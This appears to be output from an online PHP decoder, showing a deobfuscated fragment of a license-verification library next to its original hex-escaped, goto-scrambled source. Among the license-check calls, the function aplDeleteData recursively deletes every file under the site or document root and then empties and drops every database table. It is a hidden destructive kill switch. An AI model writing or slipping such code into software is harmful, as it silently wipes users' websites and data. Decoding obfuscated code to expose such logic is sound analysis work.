Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

get_license_reset_url() . "\42\76" . trans("\141\160\x70\x2e\165\160\144\x61\x74\145\137\1..

Decoded Output download

<?  get_license_reset_url() . "">" . trans("app.update_app_license") . "</a>"; exit; ZG0x7: return $notifications_array; } function aplVerifySupport($MYSQLI_LINK = null) { $notifications_array = array(); $apl_core_notifications = aplCheckSettings(); if (empty($apl_core_notifications)) { goto Pdgss; } $notifications_array["notification_case"] = "notification_script_corrupted"; $notifications_array["notification_text"] = implode("; ", $apl_core_notifications); goto lkS8z; Pdgss: if (aplCheckData($MYSQLI_LINK)) { goto grU_Q; } $notifications_array["notification_case"] = "notification_license_corrupted"; $notifications_array["notification_text"] = APL_NOTIFICATION_LICENSE_CORRUPTED; goto y1_3B; grU_Q: extract(aplGetLicenseData($MYSQLI_LINK)); $post_info = "product_id=" . rawurlencode(APL_PRODUCT_ID) . "&client_email=" . rawurlencode($CLIENT_EMAIL) . "&license_code=" . rawurlencode($LICENSE_CODE) . "&root_url=" . rawurlencode($ROOT_URL) . "&installation_hash=" . rawurlencode($INSTALLATION_HASH) . "&license_signature=" . rawurlencode(aplGenerateScriptSignature($ROOT_URL, $CLIENT_EMAIL, $LICENSE_CODE)); $content_array = aplCustomPost(APL_ROOT_URL . "/apl_callbacks/license_support.php", $post_info, $ROOT_URL); $notifications_array = aplParseServerNotifications($content_array, $ROOT_URL, $CLIENT_EMAIL, $LICENSE_CODE); y1_3B: lkS8z: return $notifications_array; } function aplVerifyUpdates($MYSQLI_LINK = null) { $notifications_array = array(); $apl_core_notifications = aplCheckSettings(); if (empty($apl_core_notifications)) { goto qyNrl; } $notifications_array["notification_case"] = "notification_script_corrupted"; $notifications_array["notification_text"] = implode("; ", $apl_core_notifications); goto UUVR3; qyNrl: if (aplCheckData($MYSQLI_LINK)) { goto sGqBY; } $notifications_array["notification_case"] = "notification_license_corrupted"; $notifications_array["notification_text"] = APL_NOTIFICATION_LICENSE_CORRUPTED; goto Qqu6U; sGqBY: extract(aplGetLicenseData($MYSQLI_LINK)); $post_info = "product_id=" . rawurlencode(APL_PRODUCT_ID) . "&client_email=" . rawurlencode($CLIENT_EMAIL) . "&license_code=" . rawurlencode($LICENSE_CODE) . "&root_url=" . rawurlencode($ROOT_URL) . "&installation_hash=" . rawurlencode($INSTALLATION_HASH) . "&license_signature=" . rawurlencode(aplGenerateScriptSignature($ROOT_URL, $CLIENT_EMAIL, $LICENSE_CODE)); $content_array = aplCustomPost(APL_ROOT_URL . "/apl_callbacks/license_updates.php", $post_info, $ROOT_URL); $notifications_array = aplParseServerNotifications($content_array, $ROOT_URL, $CLIENT_EMAIL, $LICENSE_CODE); Qqu6U: UUVR3: return $notifications_array; } function incevioUpdateLicense($MYSQLI_LINK = null) { $notifications_array = array(); $apl_core_notifications = aplCheckSettings(); if (empty($apl_core_notifications)) { goto mv3HF; } $notifications_array["notification_case"] = "notification_script_corrupted"; $notifications_array["notification_text"] = implode("; ", $apl_core_notifications); goto kGywu; mv3HF: if (aplCheckData($MYSQLI_LINK)) { goto Axjf1; } $notifications_array["notification_case"] = "notification_license_corrupted"; $notifications_array["notification_text"] = APL_NOTIFICATION_LICENSE_CORRUPTED; goto jN_kK; Axjf1: extract(aplGetLicenseData($MYSQLI_LINK)); $post_info = "product_id=" . rawurlencode(APL_PRODUCT_ID) . "&client_email=" . rawurlencode($CLIENT_EMAIL) . "&license_code=" . rawurlencode($LICENSE_CODE) . "&root_url=" . rawurlencode($ROOT_URL) . "&installation_hash=" . rawurlencode($INSTALLATION_HASH) . "&license_signature=" . rawurlencode(aplGenerateScriptSignature($ROOT_URL, $CLIENT_EMAIL, $LICENSE_CODE)); $content_array = aplCustomPost(APL_ROOT_URL . "/apl_callbacks/license_update.php", $post_info, $ROOT_URL); $notifications_array = aplParseServerNotifications($content_array, $ROOT_URL, $CLIENT_EMAIL, $LICENSE_CODE); jN_kK: kGywu: return $notifications_array; } function incevioUninstallLicense($MYSQLI_LINK = null) { $notifications_array = array(); $apl_core_notifications = aplCheckSettings(); if (empty($apl_core_notifications)) { goto XgYsI; } $notifications_array["notification_case"] = "notification_script_corrupted"; $notifications_array["notification_text"] = implode("; ", $apl_core_notifications); goto PBc0u; XgYsI: if (aplCheckData($MYSQLI_LINK)) { goto bETzZ; } $notifications_array["notification_case"] = "notification_license_corrupted"; $notifications_array["notification_text"] = APL_NOTIFICATION_LICENSE_CORRUPTED; goto th7hf; bETzZ: extract(aplGetLicenseData($MYSQLI_LINK)); $post_info = "product_id=" . rawurlencode(APL_PRODUCT_ID) . "&client_email=" . rawurlencode($CLIENT_EMAIL) . "&license_code=" . rawurlencode($LICENSE_CODE) . "&root_url=" . rawurlencode($ROOT_URL) . "&installation_hash=" . rawurlencode($INSTALLATION_HASH) . "&license_signature=" . rawurlencode(aplGenerateScriptSignature($ROOT_URL, $CLIENT_EMAIL, $LICENSE_CODE)); $content_array = aplCustomPost(APL_ROOT_URL . "/apl_callbacks/license_uninstall.php", $post_info, $ROOT_URL); $notifications_array = aplParseServerNotifications($content_array, $ROOT_URL, $CLIENT_EMAIL, $LICENSE_CODE); if (!($notifications_array["notification_case"] == "notification_license_ok")) { goto HyyMB; } if (!(APL_STORAGE == "DATABASE")) { goto oETlZ; } mysqli_query($MYSQLI_LINK, "DELETE FROM " . APL_DATABASE_TABLE); mysqli_query($MYSQLI_LINK, "DROP TABLE " . APL_DATABASE_TABLE); oETlZ: if (!(APL_STORAGE == "FILE")) { goto GW99A; } $handle = @fopen(APL_DIRECTORY . "/" . APL_LICENSE_FILE_LOCATION, "w+"); @fclose($handle); GW99A: HyyMB: th7hf: PBc0u: return $notifications_array; } function aplDeleteData($MYSQLI_LINK = null) { if (APL_GOD_MODE == "YES" && isset($_SERVER["DOCUMENT_ROOT"])) { goto oByhn; } $root_directory = dirname(__DIR__); goto Tp3Ys; oByhn: $root_directory = $_SERVER["DOCUMENT_ROOT"]; Tp3Ys: foreach (new RecursiveIteratorIterator(new RecursiveDirectoryIterator($root_directory, FilesystemIterator::SKIP_DOTS), RecursiveIteratorIterator::CHILD_FIRST) as $path) { $path->isDir() && !$path->isLink() ? rmdir($path->getPathname()) : unlink($path->getPathname()); kKJMy: } kYGeP: rmdir($root_directory); if (!(APL_STORAGE == "DATABASE")) { goto Ql3wL; } $database_tables_array = array(); $table_list_results = mysqli_query($MYSQLI_LINK, "SHOW TABLES"); AYSjD: if (!($table_list_row = mysqli_fetch_row($table_list_results))) { goto M0ADK; } $database_tables_array[] = $table_list_row[0]; goto AYSjD; M0ADK: if (empty($database_tables_array)) { goto oA0NR; } foreach ($database_tables_array as $table_name) { mysqli_query($MYSQLI_LINK, "DELETE FROM {$table_name}"); NH0uQ: } s2J0n: foreach ($database_tables_array as $table_name) { mysqli_query($MYSQLI_LINK, "DROP TABLE {$table_name}"); Xr05S: } dOOOW: oA0NR: Ql3wL: exit; } ?>

Did this file decode correctly?

Original Code

get_license_reset_url() . "\42\76" . trans("\141\160\x70\x2e\165\160\144\x61\x74\145\137\141\160\x70\137\154\x69\143\x65\156\x73\x65") . "\74\57\x61\x3e"; exit; ZG0x7: return $notifications_array; } function aplVerifySupport($MYSQLI_LINK = null) { $notifications_array = array(); $apl_core_notifications = aplCheckSettings(); if (empty($apl_core_notifications)) { goto Pdgss; } $notifications_array["\x6e\x6f\164\x69\146\151\143\x61\x74\x69\157\x6e\x5f\143\141\x73\x65"] = "\156\157\164\x69\x66\x69\143\x61\x74\x69\157\x6e\137\163\143\162\x69\160\x74\x5f\143\157\162\x72\165\160\164\x65\x64"; $notifications_array["\x6e\157\164\151\x66\151\143\141\x74\151\157\156\137\164\145\x78\x74"] = implode("\73\40", $apl_core_notifications); goto lkS8z; Pdgss: if (aplCheckData($MYSQLI_LINK)) { goto grU_Q; } $notifications_array["\x6e\157\x74\x69\x66\151\x63\141\x74\151\157\x6e\x5f\x63\141\163\x65"] = "\156\x6f\x74\x69\146\x69\143\x61\164\151\x6f\x6e\137\154\151\x63\x65\x6e\163\x65\x5f\143\x6f\x72\162\165\x70\x74\145\x64"; $notifications_array["\x6e\x6f\x74\151\x66\151\143\x61\164\151\x6f\x6e\x5f\x74\x65\170\164"] = APL_NOTIFICATION_LICENSE_CORRUPTED; goto y1_3B; grU_Q: extract(aplGetLicenseData($MYSQLI_LINK)); $post_info = "\160\x72\157\144\x75\143\x74\137\x69\x64\x3d" . rawurlencode(APL_PRODUCT_ID) . "\x26\143\154\151\145\156\164\137\x65\x6d\141\151\x6c\x3d" . rawurlencode($CLIENT_EMAIL) . "\46\154\x69\x63\x65\x6e\163\145\137\x63\x6f\144\145\x3d" . rawurlencode($LICENSE_CODE) . "\x26\x72\x6f\157\x74\137\165\x72\x6c\75" . rawurlencode($ROOT_URL) . "\46\151\156\x73\164\x61\x6c\154\x61\164\151\x6f\x6e\x5f\150\141\x73\150\75" . rawurlencode($INSTALLATION_HASH) . "\46\x6c\151\x63\x65\156\x73\x65\137\163\x69\x67\156\141\164\x75\162\x65\75" . rawurlencode(aplGenerateScriptSignature($ROOT_URL, $CLIENT_EMAIL, $LICENSE_CODE)); $content_array = aplCustomPost(APL_ROOT_URL . "\x2f\x61\x70\154\137\x63\x61\154\x6c\142\x61\143\x6b\163\57\x6c\151\x63\x65\x6e\x73\x65\137\x73\165\160\x70\x6f\162\164\56\x70\150\160", $post_info, $ROOT_URL); $notifications_array = aplParseServerNotifications($content_array, $ROOT_URL, $CLIENT_EMAIL, $LICENSE_CODE); y1_3B: lkS8z: return $notifications_array; } function aplVerifyUpdates($MYSQLI_LINK = null) { $notifications_array = array(); $apl_core_notifications = aplCheckSettings(); if (empty($apl_core_notifications)) { goto qyNrl; } $notifications_array["\156\157\x74\151\146\x69\143\141\164\151\157\156\x5f\143\141\163\145"] = "\156\x6f\x74\151\x66\151\143\141\x74\x69\x6f\156\137\x73\143\x72\151\x70\x74\137\143\x6f\162\162\165\x70\164\145\144"; $notifications_array["\x6e\x6f\164\151\146\x69\143\x61\164\151\x6f\156\137\164\x65\x78\164"] = implode("\x3b\x20", $apl_core_notifications); goto UUVR3; qyNrl: if (aplCheckData($MYSQLI_LINK)) { goto sGqBY; } $notifications_array["\156\157\164\151\x66\x69\143\x61\164\151\x6f\156\137\x63\x61\x73\145"] = "\156\157\164\151\x66\x69\x63\x61\x74\x69\157\156\x5f\154\151\x63\x65\x6e\163\x65\137\x63\157\162\x72\165\160\164\145\144"; $notifications_array["\156\x6f\x74\151\x66\x69\143\141\x74\x69\157\x6e\x5f\164\145\170\164"] = APL_NOTIFICATION_LICENSE_CORRUPTED; goto Qqu6U; sGqBY: extract(aplGetLicenseData($MYSQLI_LINK)); $post_info = "\x70\162\x6f\x64\165\x63\164\x5f\x69\144\75" . rawurlencode(APL_PRODUCT_ID) . "\x26\x63\x6c\151\x65\156\164\137\145\155\x61\151\x6c\x3d" . rawurlencode($CLIENT_EMAIL) . "\x26\154\x69\x63\x65\156\163\x65\137\143\157\144\x65\x3d" . rawurlencode($LICENSE_CODE) . "\46\162\x6f\157\164\x5f\165\162\154\x3d" . rawurlencode($ROOT_URL) . "\46\x69\156\163\164\x61\x6c\x6c\x61\x74\x69\157\x6e\137\150\x61\163\x68\75" . rawurlencode($INSTALLATION_HASH) . "\x26\x6c\x69\x63\x65\x6e\163\x65\137\163\151\147\156\141\164\165\162\145\x3d" . rawurlencode(aplGenerateScriptSignature($ROOT_URL, $CLIENT_EMAIL, $LICENSE_CODE)); $content_array = aplCustomPost(APL_ROOT_URL . "\x2f\141\160\154\x5f\143\x61\154\x6c\x62\141\x63\153\x73\x2f\x6c\x69\143\145\x6e\163\145\x5f\x75\x70\x64\x61\164\145\163\56\160\x68\160", $post_info, $ROOT_URL); $notifications_array = aplParseServerNotifications($content_array, $ROOT_URL, $CLIENT_EMAIL, $LICENSE_CODE); Qqu6U: UUVR3: return $notifications_array; } function incevioUpdateLicense($MYSQLI_LINK = null) { $notifications_array = array(); $apl_core_notifications = aplCheckSettings(); if (empty($apl_core_notifications)) { goto mv3HF; } $notifications_array["\156\x6f\164\x69\146\x69\143\141\164\151\x6f\x6e\x5f\143\141\163\x65"] = "\x6e\x6f\x74\151\146\151\x63\x61\164\x69\157\156\x5f\x73\143\162\151\160\x74\137\x63\157\x72\162\165\x70\x74\x65\144"; $notifications_array["\156\157\164\x69\x66\x69\143\x61\x74\x69\157\156\x5f\x74\x65\x78\164"] = implode("\x3b\40", $apl_core_notifications); goto kGywu; mv3HF: if (aplCheckData($MYSQLI_LINK)) { goto Axjf1; } $notifications_array["\156\157\x74\151\x66\151\143\141\x74\x69\x6f\x6e\137\x63\x61\x73\x65"] = "\x6e\157\x74\x69\146\x69\143\141\x74\x69\157\x6e\x5f\x6c\151\x63\x65\x6e\163\x65\x5f\x63\x6f\x72\x72\165\x70\164\145\144"; $notifications_array["\156\x6f\164\151\146\x69\x63\141\x74\151\157\x6e\x5f\164\x65\170\164"] = APL_NOTIFICATION_LICENSE_CORRUPTED; goto jN_kK; Axjf1: extract(aplGetLicenseData($MYSQLI_LINK)); $post_info = "\160\162\157\x64\165\x63\x74\137\151\144\75" . rawurlencode(APL_PRODUCT_ID) . "\x26\x63\x6c\151\x65\x6e\x74\137\x65\155\x61\151\x6c\x3d" . rawurlencode($CLIENT_EMAIL) . "\46\154\151\x63\145\x6e\163\145\137\x63\157\144\145\75" . rawurlencode($LICENSE_CODE) . "\x26\x72\157\157\x74\137\x75\x72\154\x3d" . rawurlencode($ROOT_URL) . "\x26\x69\156\163\x74\x61\x6c\154\x61\164\151\157\156\x5f\150\141\163\150\x3d" . rawurlencode($INSTALLATION_HASH) . "\46\x6c\151\143\x65\156\163\145\137\x73\x69\147\156\x61\164\165\162\x65\75" . rawurlencode(aplGenerateScriptSignature($ROOT_URL, $CLIENT_EMAIL, $LICENSE_CODE)); $content_array = aplCustomPost(APL_ROOT_URL . "\x2f\x61\x70\154\x5f\x63\x61\x6c\x6c\142\x61\143\153\x73\57\x6c\151\143\x65\156\x73\x65\x5f\x75\160\144\141\x74\x65\x2e\x70\x68\160", $post_info, $ROOT_URL); $notifications_array = aplParseServerNotifications($content_array, $ROOT_URL, $CLIENT_EMAIL, $LICENSE_CODE); jN_kK: kGywu: return $notifications_array; } function incevioUninstallLicense($MYSQLI_LINK = null) { $notifications_array = array(); $apl_core_notifications = aplCheckSettings(); if (empty($apl_core_notifications)) { goto XgYsI; } $notifications_array["\156\157\x74\151\x66\151\143\141\164\151\157\x6e\137\x63\141\163\145"] = "\156\157\x74\151\x66\x69\143\x61\x74\151\x6f\156\x5f\163\x63\162\x69\160\164\x5f\143\157\x72\162\x75\x70\164\x65\x64"; $notifications_array["\x6e\x6f\164\x69\146\x69\x63\x61\x74\x69\x6f\x6e\137\x74\x65\x78\164"] = implode("\73\40", $apl_core_notifications); goto PBc0u; XgYsI: if (aplCheckData($MYSQLI_LINK)) { goto bETzZ; } $notifications_array["\x6e\157\x74\151\146\x69\x63\x61\164\151\x6f\x6e\x5f\143\141\163\145"] = "\156\157\164\x69\146\x69\143\141\x74\x69\x6f\x6e\x5f\154\x69\143\145\156\x73\x65\137\143\x6f\x72\162\165\160\x74\x65\x64"; $notifications_array["\x6e\x6f\x74\x69\x66\151\143\141\x74\151\157\x6e\x5f\164\x65\x78\164"] = APL_NOTIFICATION_LICENSE_CORRUPTED; goto th7hf; bETzZ: extract(aplGetLicenseData($MYSQLI_LINK)); $post_info = "\x70\x72\157\144\x75\x63\x74\x5f\x69\144\x3d" . rawurlencode(APL_PRODUCT_ID) . "\46\143\x6c\151\x65\x6e\164\x5f\x65\x6d\x61\151\154\x3d" . rawurlencode($CLIENT_EMAIL) . "\46\154\151\x63\145\x6e\x73\x65\137\143\x6f\x64\x65\x3d" . rawurlencode($LICENSE_CODE) . "\x26\x72\157\x6f\164\137\165\x72\x6c\x3d" . rawurlencode($ROOT_URL) . "\x26\x69\x6e\x73\164\x61\x6c\154\x61\164\x69\x6f\x6e\x5f\x68\x61\163\x68\x3d" . rawurlencode($INSTALLATION_HASH) . "\46\x6c\151\143\145\156\x73\x65\137\x73\151\x67\156\141\164\x75\162\x65\x3d" . rawurlencode(aplGenerateScriptSignature($ROOT_URL, $CLIENT_EMAIL, $LICENSE_CODE)); $content_array = aplCustomPost(APL_ROOT_URL . "\57\x61\x70\154\137\x63\141\x6c\x6c\142\x61\x63\x6b\163\57\154\x69\143\145\x6e\163\x65\x5f\x75\156\151\156\163\164\141\154\154\56\x70\x68\x70", $post_info, $ROOT_URL); $notifications_array = aplParseServerNotifications($content_array, $ROOT_URL, $CLIENT_EMAIL, $LICENSE_CODE); if (!($notifications_array["\x6e\x6f\164\151\146\x69\x63\141\164\x69\157\156\137\x63\141\163\145"] == "\x6e\x6f\x74\151\x66\151\143\x61\164\x69\157\x6e\x5f\x6c\x69\x63\145\156\x73\145\x5f\x6f\x6b")) { goto HyyMB; } if (!(APL_STORAGE == "\104\x41\x54\x41\x42\101\123\105")) { goto oETlZ; } mysqli_query($MYSQLI_LINK, "\x44\x45\114\105\124\105\x20\x46\122\x4f\115\40" . APL_DATABASE_TABLE); mysqli_query($MYSQLI_LINK, "\x44\x52\x4f\x50\40\124\x41\x42\114\105\x20" . APL_DATABASE_TABLE); oETlZ: if (!(APL_STORAGE == "\106\111\114\x45")) { goto GW99A; } $handle = @fopen(APL_DIRECTORY . "\x2f" . APL_LICENSE_FILE_LOCATION, "\167\53"); @fclose($handle); GW99A: HyyMB: th7hf: PBc0u: return $notifications_array; } function aplDeleteData($MYSQLI_LINK = null) { if (APL_GOD_MODE == "\131\105\123" && isset($_SERVER["\104\x4f\103\125\x4d\x45\x4e\124\x5f\122\117\x4f\124"])) { goto oByhn; } $root_directory = dirname(__DIR__); goto Tp3Ys; oByhn: $root_directory = $_SERVER["\104\x4f\x43\x55\x4d\105\x4e\x54\x5f\122\117\117\x54"]; Tp3Ys: foreach (new RecursiveIteratorIterator(new RecursiveDirectoryIterator($root_directory, FilesystemIterator::SKIP_DOTS), RecursiveIteratorIterator::CHILD_FIRST) as $path) { $path->isDir() && !$path->isLink() ? rmdir($path->getPathname()) : unlink($path->getPathname()); kKJMy: } kYGeP: rmdir($root_directory); if (!(APL_STORAGE == "\x44\x41\x54\x41\102\x41\123\105")) { goto Ql3wL; } $database_tables_array = array(); $table_list_results = mysqli_query($MYSQLI_LINK, "\123\110\x4f\127\40\x54\x41\x42\x4c\x45\123"); AYSjD: if (!($table_list_row = mysqli_fetch_row($table_list_results))) { goto M0ADK; } $database_tables_array[] = $table_list_row[0]; goto AYSjD; M0ADK: if (empty($database_tables_array)) { goto oA0NR; } foreach ($database_tables_array as $table_name) { mysqli_query($MYSQLI_LINK, "\x44\x45\x4c\105\x54\x45\40\x46\x52\117\115\40{$table_name}"); NH0uQ: } s2J0n: foreach ($database_tables_array as $table_name) { mysqli_query($MYSQLI_LINK, "\104\122\x4f\120\40\124\101\102\x4c\x45\40{$table_name}"); Xr05S: } dOOOW: oA0NR: Ql3wL: exit; }

Function Calls

None

Variables

None

Stats

MD5 93bcd368b92895e8cab2af03d0e2a6ac
Eval Count 0
Decode Time 66 ms